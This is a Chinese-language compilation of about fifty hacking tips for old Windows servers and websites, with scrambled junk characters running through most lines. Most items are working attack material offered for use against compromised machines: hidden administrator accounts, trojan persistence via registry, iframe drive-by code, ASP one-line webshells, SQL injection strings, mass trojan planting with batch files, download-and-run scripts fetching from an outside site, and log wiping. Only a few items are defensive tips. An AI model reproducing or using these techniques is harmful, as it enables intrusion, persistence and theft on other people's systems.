Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
9 T2 n$ v8 B6 _+ K8 I$ b9 Ncacls C:\windows\system32 /G hqw20:R
2 e% |% ~6 D# \% Y( J4 B" ?2 M& J g% l思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入" m) p5 H6 h+ X+ v7 g
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F4 m2 _: Q# d3 k. V% ~
; l' j* X2 \' ?3 b' n9 I: t
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
) i9 j8 O% g V
" c) l, N9 {; `. d+ P. f3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
# j4 `3 X( b/ W0 i6 v1 V- ~6 L# C
6 ^) m( w- F3 m! ] i! u4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
3 T. ? E' F3 M& Q9 D7 D- s- i
) ]) R% p3 Z9 |' r. E h: y5、利用INF文件来修改注册表
} ~9 @2 u! o& R0 R& t4 h) @[Version]" i, N: @# @* v; T% ~. g1 H* R
Signature="$CHICAGO$"- _. \+ q0 B. \1 B7 Y# o1 A
[Defaultinstall]/ o& r8 q- Y" `# X
addREG=Ating
& e7 x5 a. Q f[Ating]
# A, t6 i$ b, k ~: @' r) lHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
8 g7 F, A7 |- Y5 E$ \9 t* s以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:) N6 _, D* f- k& @
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
9 R1 I2 Q" z+ G2 A其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU, c( r3 R" _- n# ^
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
8 f2 J' z9 U9 U, ^' F3 VHKEY_CURRENT_CONFIG 简写为 HKCC. _) }; L+ \: x. v+ `, o4 G
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值1 Z2 @; l% P9 g
"1"这里代表是写入或删除注册表键值中的具体数据
! o1 L/ c/ z" V/ g! G/ Z! q
, [ S T9 h7 D, U2 h6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,( G" w7 E# D3 e2 T( m
多了一步就是在防火墙里添加个端口,然后导出其键值
- q; ~$ T: _7 w. ~# D& N[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
4 E8 H [$ u9 f/ j+ T' J1 X) d8 @6 J- Y; l! i d% B
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
) }' k' C1 S& Q, C, M, F在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。4 p+ ]( V6 \0 e, a7 _2 g; s% B
! A: T: W; c* S3 D2 K+ d
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。1 Z1 J8 v; C8 [6 y$ d. f
, g0 O2 w( p( d' L4 i1 O% i1 u+ D' O' t
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,& m2 N- s. R/ p& m& `
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。' L- ]8 U* Q# ~7 F6 D
R* ?- N0 h, F% \, H, I10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
! ~4 y" L5 }' P) |& V/ j9 ]% x
) G, M. E$ L9 `& G3 N& }0 ~) `$ S11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,- ?* D3 C: E9 k3 k4 s: i5 Q
用法:xsniff –pass –hide –log pass.txt( n1 a5 B5 y* j" ]9 }. i2 P# B. q" X
L* C$ {5 r5 Z4 c( B12、google搜索的艺术
+ G- [; C o0 f搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”3 ~( ~0 K8 c/ t* Y+ Q5 \- v& {4 i1 H
或“字符串的语法错误”可以找到很多sql注入漏洞。
9 Y3 b# h; L" p/ N2 }3 v
: S6 d& k* @, H4 J9 F" s13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
; K3 @0 @8 u& @5 D5 ~2 k: H, [% k! e8 G- f5 X$ Q
14、cmd中输入 nc –vv –l –p 1987
) c2 X% n- y+ Z5 _- _做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃: L. ~4 ?( O6 a z q, R- @
( M7 Z" j9 j! W. o15、制作T++木马,先写个ating.hta文件,内容为
! s3 ]; F! Q$ {. V<script language="VBScript">
" e- H% u! u \( ?- I2 F( Q' wset wshshell=createobject ("wscript.shell" )
3 d# Z, Y; |+ L% S; Ca=wshshell.run("你马的名称",1)
( \5 U, C) U0 {6 x: a+ F$ dwindow.close
0 }# n- B9 Q7 G/ ^</script>+ x% a9 u; B# ]) A. c2 I* _8 l/ q
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。* E( J6 t$ s& R; G
! o+ m0 J( V0 r6 I; V( G16、搜索栏里输入+ ~9 D/ U& H( f" C- z
关键字%'and 1=1 and '%'='
9 a0 I: \: }+ G: ~" k$ `' P4 @) `关键字%'and 1=2 and '%'='. l+ X3 F/ x9 t8 `. x9 @6 o/ t
比较不同处 可以作为注入的特征字符
! D8 e% P* L" o* x! q1 J1 e- S
8 R3 a9 _( q; K2 y17、挂马代码<html>1 Q, E) D% U0 P b' Q
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
6 X6 ]7 s/ [& C4 e3 T( L</html>
! ~" p) s5 q$ q e t \% Y* g- D& u7 o. g4 e$ c: A6 c4 [; x
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,4 X" W1 N3 o7 s3 k
net localgroup administrators还是可以看出Guest是管理员来。
: o# C* E6 o. _* x* D2 T9 [4 H: ]4 F5 c* D" x- e+ i
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等$ v' F$ {& u9 p5 w8 \+ J
用法: 安装: instsrv.exe 服务名称 路径" k5 n5 C. m% |* C( T/ u% Y
卸载: instsrv.exe 服务名称 REMOVE
2 K9 y, r$ x# L- K) H ]$ `$ K# z* N. Q% W
, E. z7 T4 M! g% I$ N3 f. ]! J8 {21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉: V. V7 r& D$ E; B3 p7 ^2 ^
不能注入时要第一时间想到%5c暴库。: C. F- O# P. s3 h* [* |: ~
6 q. u5 U! [) _3 H# F5 }
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~6 m/ f' e6 W" b+ Z: ~ Y
/ d1 Z5 n: t. C5 V( d23、缺少xp_cmdshell时
7 s* \6 h5 D( p% @5 f尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
" B l$ {. O( [. h D; C假如恢复不成功,可以尝试直接加用户(针对开3389的)
& Q8 p% i ?+ B1 L" |3 w, Ideclare @o int
" C5 z9 m" B" xexec sp_oacreate 'wscript.shell',@o out
3 y; v. O7 y/ x8 u$ k7 z$ B$ Yexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
8 I k1 K' e/ R5 u( q& @1 \! W$ k' c
24.批量种植木马.bat
" \9 N) G+ w9 x$ l/ E* i4 R7 Pfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
( w* \; n/ p, G, T( i8 Wfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间5 x" v: c- L- U+ f6 M4 J3 ^- |- z
扫描地址.txt里每个主机名一行 用\\开头
8 i# ^. o$ [1 W6 t* \9 u# h/ R$ e/ P+ T; d. ~- _
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
5 j% U! Y9 y9 U. B9 n* {
; s& S& ^ C1 }# c0 Q26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
" p3 e1 [; }4 E# q2 N将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.7 L( l/ j# W! p8 O* }( u2 E* `
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马, L3 d* V8 h0 m4 a# F
- f! E8 g* U# g9 E27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP, }4 ], P# F& u2 [ ]6 M/ F; {. s% c
然后用#clear logg和#clear line vty *删除日志
8 K F9 \( l( t7 W6 w; r. ]) {
, w j* L- B) l28、电脑坏了省去重新安装系统的方法
+ O# a4 R+ Z# K纯dos下执行," l& b4 w& V, Q' B( I r1 G
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
' D3 H9 e% I) \; z2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config5 p) k0 k. N. [8 Q
+ L: k8 G; |( U' S
29、解决TCP/IP筛选 在注册表里有三处,分别是:
0 |7 v. c, {3 D5 s# MHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip& |& ~' y7 |3 H0 Y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip0 R' V P' `: P; E
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; q. Q8 l( y8 m( y分别用! u: U/ r3 O3 ^3 S7 O1 L
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, g# a& L, P% }* Z- l9 lregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ ?1 F% t: ]" {. s- @* mregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" x+ V, ]: D- i0 P
命令来导出注册表项
% w4 b1 E3 f U, x% I然后把三个文件里的EnableSecurityFilters"=dword:00000001,+ k2 e u5 W5 a( \8 A
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用/ y/ H! m- N- I7 C6 B! [" y n% q
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
3 x) k' r/ y; V) {" {9 `. ~1 ]( S! _( H! k* @
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U' l1 W+ M4 L8 O$ ^" S8 v
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
7 X8 P: U( F" K3 j
% z6 b; x2 y3 |. T; D# }2 _31、全手工打造开3389工具. U. Z" t+ j% i2 t$ L, o
打开记事本,编辑内容如下:
7 t+ h3 o! Q( o. T. M& o! j$ Uecho [Components] > c:\sql
3 N- U8 E- _( l3 j) [echo TSEnable = on >> c:\sql- G* E9 ]4 X: s( O6 K! P5 d. |
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
6 ~4 ~/ _4 s' Z' F; k7 ~0 c- g编辑好后存为BAT文件,上传至肉鸡,执行2 z7 ?3 w; y* S- l* T! b# m+ h
O- l; j1 l- |$ L! a
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马 ~% L; Q$ b4 l# {5 [7 I) V
0 Z' ^5 f' h4 U/ N33、让服务器重启
( @8 ^/ ^1 y7 T8 r+ Y写个bat死循环:
/ B8 p2 A# Y/ u- P( r@echo off
3 { F) m4 P. s |:loop10 K9 e7 K8 n X7 _$ n/ a$ m
cls
1 n" G: r- d9 _, Ustart cmd.exe
& R5 H( g; ?8 ] W3 n% f% H }goto loop1
" q; u: F# h1 P% [; t# a保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启! @; q+ S8 ~' A2 S! V
/ v' q: V% }3 V
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
1 E0 f' a+ P4 p' ~0 g1 M@echo off J; R3 M% [( \/ {* A
date /t >c:/3389.txt
# g& F3 }4 r8 q3 T2 l# d! [( xtime /t >>c:/3389.txt$ `: Q7 {5 q& t
attrib +s +h c:/3389.bat
# z2 |5 r0 {" B! i8 ~, yattrib +s +h c:/3389.txt
1 L: l- R( p u) G8 [+ Y8 Onetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
' T6 w* _& S2 ?并保存为3389.bat5 W3 z5 ^3 |& Z1 s
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号 g, ]$ @/ ]. [$ ~
. n2 [# Z2 g1 y5 O0 y
35、有时候提不了权限的话,试试这个命令,在命令行里输入:1 r$ h% ^4 q# J$ `! c# v
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
# M# U( m `3 q0 K Q2 s输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
: A5 H% L8 w. n. q5 F5 h8 Z! R6 L$ R3 d0 d5 @* X( s; T8 B
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
* S, F. D0 w9 {. [" r7 b: ~) ^9 ~echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
+ c3 y; y9 K2 D" ?* Q( lecho 你的FTP账号 >>c:\1.bat //输入账号
; B6 [- [ G6 O, R9 Hecho 你的FTP密码 >>c:\1.bat //输入密码3 ^3 q9 k" k2 [) J
echo bin >>c:\1.bat //登入
, [3 E# k# |$ Becho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么& F- n7 K$ |- s% K4 _
echo bye >>c:\1.bat //退出
) T6 {0 O$ r* r) U' b: J然后执行ftp -s:c:\1.bat即可" I6 ^% l6 S! H# H% w
' h- p. e% e( a4 }0 X4 k) l9 G9 T3 l37、修改注册表开3389两法
' B( a3 z1 V; h5 ]7 V( n(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
+ H2 w2 t. [- Y$ @' Necho Windows Registry Editor Version 5.00 >>3389.reg7 l9 _ [1 V- q, z5 {% K
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg9 Y4 w5 A( a2 B, @" I( ^; g7 b0 r
echo "Enabled"="0" >>3389.reg
3 C6 c Y2 w: k' uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
- P1 f. C0 N MNT\CurrentVersion\Winlogon] >>3389.reg
" q' `1 Z( n! |( U4 decho "ShutdownWithoutLogon"="0" >>3389.reg
& O+ c+ `4 q/ J& q. wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]7 H, J/ V( c' f$ t% ~5 o
>>3389.reg
; n6 Q# z" T8 N, X5 Aecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
# E8 y; _, _2 Z) Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]. ~$ d$ I( t; [
>>3389.reg! y8 V4 L5 M; w
echo "TSEnabled"=dword:00000001 >>3389.reg [" M: Q3 M' F }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg1 x1 p: h. n% q6 M# r7 Z% O5 F- B
echo "Start"=dword:00000002 >>3389.reg
3 \! {$ U/ D; L+ ~( q$ eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]5 P$ E% k+ A$ {- i: N" L8 h; J
>>3389.reg1 `: Y( I8 Z" M/ A; i- h
echo "Start"=dword:00000002 >>3389.reg
+ D2 l; a: j! Becho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg9 W0 O& @% O8 n- B- C: Q
echo "Hotkey"="1" >>3389.reg0 i4 t# e8 G1 b. ~) E: O* u
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& ?: [9 s7 x& Q5 Q
Server\Wds\rdpwd\Tds\tcp] >>3389.reg' S2 s2 R( N `: o6 }
echo "PortNumber"=dword:00000D3D >>3389.reg. m! R; o9 e0 u C% V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 {! o& l& K" t. y: K/ [
Server\WinStations\RDP-Tcp] >>3389.reg
0 m. h C% a: |6 D' R3 Y; P( _, Iecho "PortNumber"=dword:00000D3D >>3389.reg" t8 Z5 J0 H' b+ B% ~
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
, n8 J; [+ V8 ~; C(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)$ w( { A \* K, Z2 M2 N# _. E
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
+ L% ?5 l2 n; I$ D7 k(2)winxp和win2003终端开启: ^+ m) D( s; O, H! p
用以下ECHO代码写一个REG文件:
1 x) h5 g$ U _0 B7 pecho Windows Registry Editor Version 5.00>>3389.reg+ l% d. \& b+ Z+ ?/ c0 f2 y% `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 ^% @% @5 D( l$ E0 YServer]>>3389.reg9 F/ I% N/ \0 v: Y
echo "fDenyTSConnections"=dword:00000000>>3389.reg
+ S' ~ S8 M- _# W$ J7 H9 _+ Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ z% w1 y1 E4 @( W
Server\Wds\rdpwd\Tds\tcp]>>3389.reg* z" {4 A2 z# y3 h& r% h( ]
echo "PortNumber"=dword:00000d3d>>3389.reg0 t0 T$ u) y8 q7 P' p# r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" n/ j0 C9 N( I z
Server\WinStations\RDP-Tcp]>>3389.reg1 |6 U% Y1 P4 S! k: S
echo "PortNumber"=dword:00000d3d>>3389.reg0 E/ m( k4 |& w, P9 s0 I( K3 `4 K
然后regedit /s 3389.reg del 3389.reg8 _* ?3 x! A4 `7 k2 o
XP下不论开终端还是改终端端口都不需重启! c) ~& O, ~/ S
2 T m6 v7 L1 l# N
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃0 J4 @: x2 N) U) `, s
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 y, Z* e* A' v1 N( F9 K% p& c( m2 Y: t; u: O
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!$ @$ y8 J$ }& {2 M
(1)数据库文件名应复杂并要有特殊字符
' X) _8 ` \5 n8 r- k5 V" b5 {(2)不要把数据库名称写在conn.asp里,要用ODBC数据源& @+ a* ~' t3 Y- v2 Y2 V w9 Z
将conn.asp文档中的- K- f$ G+ v3 R
DBPath = Server.MapPath("数据库.mdb")
9 {' ?1 J. R# w) m3 pconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
. V0 v1 s- u F1 t! F
/ V. Z3 ]4 G# R( S- n3 q/ X* Z修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
|" B/ j4 w5 e$ W$ W9 R; c(3)不放在WEB目录里
* B( S; T4 Q6 R0 A; Z4 m$ b2 t# O' K: g2 g X, C) H1 X
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉% ^( u! t# a. d( J% R# q
可以写两个bat文件% u' |4 X% j1 g5 U$ I8 k' c8 L- \
@echo off
/ B% C; n a* z4 q- R7 |@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
) Z1 j% i. H$ y4 [6 [, `@del c:\winnt\system32\query.exe
: }: a9 F: @( o+ b0 d, O5 u6 @@del %SYSTEMROOT%\system32\dllcache\query.exe
/ c; ^$ c! Z2 Y6 V@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
; j4 p6 }0 `" b; H$ j2 I% m& Y6 W, Q
@echo off. }* r- @% |+ Z! b- Z
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe- a* x" C/ y6 f3 ~ _$ S
@del c:\winnt\system32\tsadmin.exe
% y. ]7 w: d+ K) L@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
1 N7 @0 a+ x" D6 W+ Q% \2 {
n8 Z, G8 m# R41、映射对方盘符
' s! I: u7 M1 ` ?telnet到他的机器上,5 t/ s) } b, C' Z2 c# b
net share 查看有没有默认共享 如果没有,那么就接着运行
3 y" u1 ^% _9 Unet share c$=c:
/ f8 @% u% A* {, a. P! inet share现在有c$: G, @6 z5 @) m1 W
在自己的机器上运行4 t" u$ D5 f$ N, m7 v
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
' \5 n% a. d$ u Y: p N2 N1 D% o. F8 O+ W1 Z3 ]
42、一些很有用的老知识
8 Y% v% D. u" S( y n( Mtype c:\boot.ini ( 查看系统版本 )
0 e* Q& c) p2 x( b4 j. L7 Rnet start (查看已经启动的服务); X$ O3 w! X. D
query user ( 查看当前终端连接 )
( f7 Y$ c3 D6 A) n0 g# Rnet user ( 查看当前用户 )) ]( U4 v0 C5 W B
net user 用户 密码/add ( 建立账号 )
6 Y0 \3 H5 f- A% `9 D+ Lnet localgroup administrators 用户 /add (提升某用户为管理员)1 K5 K& M% M, o4 ^& r3 w8 f+ n5 J4 Y
ipconfig -all ( 查看IP什么的 )
# \" g' ~& F" k& @* wnetstat -an ( 查看当前网络状态 ): T( H# b W; M! |& M& x
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
! q3 l3 k' ~/ S( G8 I克隆时Administrator对应1F4! q/ e$ j" U# ^+ \% e+ o8 T0 E
guest对应1F5% X9 S, q' h( O2 z7 ~
tsinternetuser对应3E8" ?. { W9 P( s6 P
) H5 p' L5 W; M1 M8 G
43、如果对方没开3389,但是装了Remote Administrator Service: b7 T; G+ f: u" B8 F0 g/ j, W. Z
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
$ S$ {1 @# g3 j7 H N3 |" ~解释:用serv-u漏洞导入自己配制好的radmin的注册表信息3 h2 [: T9 E* D3 S. v- B
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"$ h+ G1 G1 B8 g, J' \7 X( i
4 i8 O; H4 l1 c* E1 n& r9 U
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)5 |+ k: f. z% G( o1 e2 I
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)# I* j% I5 Q8 }& P# P, ^
4 v/ f8 X' V5 ?% x45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入), A. U0 \8 W$ L2 Y- o* s5 K1 x1 `
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
& n# Y$ |8 y4 T" R* J5 O$ z6 f^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =" r& \6 k* G* Y5 h4 P. @$ Y d
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
9 j6 g& L1 R1 a3 ]5 Z4 j8 H9 K, O1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
& p% G$ b5 T$ t# |: I6 m. s(这是完整的一句话,其中没有换行符)
2 z6 r6 u6 x$ C, D/ w# f! F' g然后下载:
: E# V% q, d1 }/ n* ucscript down.vbs http://www.hack520.org/hack.exe hack.exe+ l2 P, l* B! X9 [9 d/ Z8 Q
/ v. U; b- c: P4 G& E7 M" A1 ^# T u46、一句话木马成功依赖于两个条件:
- c8 A+ ^3 g, T1 ?$ E, {9 {4 o. a2 o) s1、服务端没有禁止adodb.Stream或FSO组件
1 M0 K- M+ _! h8 E2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
5 g# i) u A+ ]$ l5 Y4 N; T2 w- h0 W
47、利用DB_OWNER权限进行手工备份一句话木马的代码:. W) o O6 E" l" m
;alter database utsz set RECOVERY FULL--
. y+ L e9 H; _% U' q;create table cmd (a image)--9 @8 X% A8 k5 ~& ~5 q0 T# K8 B! Y9 ^
;backup log utsz to disk = 'D:\cmd' with init--: z# q9 @2 T; A; C$ V
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
5 I, @/ @1 n( N1 H0 d$ A$ r2 a;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
0 ]$ l7 z" X7 v+ x6 A" y" h( C2 x注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
( @& n$ J/ I% [" {3 u, @: j" \% z- e. j5 c8 s0 d/ r
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:' O1 @; F* X+ S, }
* }, h4 }. C8 n) J用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
: C8 J' j' R. `0 U所有会话用 'all'。
7 P3 h* K% m6 E4 T- \9 i-s sessionid 列出会话的信息。0 H8 L7 }- h. E( c6 Q( v
-k sessionid 终止会话。3 Q( ?% ~" }2 _5 F) H# R3 n
-m sessionid 发送消息到会话。
7 H/ Q T6 U! x# C5 m" A# E, s8 l: E
config 配置 telnet 服务器参数。
7 B* U1 }9 \5 l% G% C. h) W) ]) M9 G" }0 y3 b
common_options 为:
F& z3 {" G- @ b! Z% Y-u user 指定要使用其凭据的用户8 P: R6 O: k! }- l) C
-p password 用户密码
& | ]2 N' e8 l' f& a) m* i8 x4 x% J: m9 d# h7 d5 A
config_options 为:0 U0 p9 X3 C& r( u: E; ]
dom = domain 设定用户的默认域6 q. S: a+ b7 H8 C* d5 v, K& k. K
ctrlakeymap = yes|no 设定 ALT 键的映射3 _, N1 e K0 E: c1 m8 X. i
timeout = hh:mm:ss 设定空闲会话超时值
- n: s3 j6 {. D7 E( P1 Ptimeoutactive = yes|no 启用空闲会话。
% f! i/ \# l; _2 jmaxfail = attempts 设定断开前失败的登录企图数。& }) @6 J" b5 H
maxconn = connections 设定最大连接数。
6 m1 x/ b( f0 Nport = number 设定 telnet 端口。# O4 X5 R# E5 I# S ?; u% l
sec = [+/-]NTLM [+/-]passwd) P3 `# C% t: k5 Q( O) H2 Z7 `9 e
设定身份验证机构
2 Q! ^' C& N: k0 @fname = file 指定审计文件名。
: ^% B, F) s9 i) |/ c' Ifsize = size 指定审计文件的最大尺寸(MB)。
4 }4 I c+ N( j. F* X- `mode = console|stream 指定操作模式。
, ~. w5 @9 D! x5 |& |auditlocation = eventlog|file|both
$ \% l. ?8 D6 b9 X2 B; h' o1 @9 r指定记录地点' L) K# u9 n1 F5 W% ]
audit = [+/-]user [+/-]fail [+/-]admin2 m. \) Q7 F b+ S3 R1 M. k
, Z- L7 T6 j4 B/ a% C5 T0 R8 h/ s' i49、例如:在IE上访问:
+ h+ ?! ]% ]- E% m7 [: Nwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/' W+ [8 U2 r0 }% T3 [
hack.txt里面的代码是:
& y$ q% _6 ^$ C5 X1 `, @<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
: k1 x% x% H/ n- e8 r把这个hack.txt发到你空间就可以了!& f, f6 x+ C! N: U& \
这个可以利用来做网马哦! u* a" \5 J; K6 W9 a
7 A# f; o7 F! @5 W4 g8 m/ \50、autorun的病毒可以通过手动限制!
9 f& {! K; \( R V* S. K# u1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!( r; ^1 N- f7 [2 ~$ x6 Q+ }0 y
2,打开盘符用右键打开!切忌双击盘符~5 j/ b2 v+ R1 _5 m
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!7 ]8 e# u+ W9 ]
$ b& ^4 V2 I9 l( E" W51、log备份时的一句话木马:
& M* k4 S3 c; W8 e6 g/ `& V9 Ka).<%%25Execute(request("go"))%%25>7 \' ^, i3 A2 u5 T: a" J/ x
b).<%Execute(request("go"))%>8 |3 I O' s/ O- m# X
c).%><%execute request("go")%><%* B+ s+ w7 B l# t' J
d).<script language=VBScript runat=server>execute request("sb")</Script>* v( l0 ~4 s* U9 t( ~6 C
e).<%25Execute(request("l"))%25>" u: l5 Y4 z' x- R4 Y/ B) F
f).<%if request("cmd")<>"" then execute request("pass")%>0 A' o8 N/ C* B. ?. e/ ~
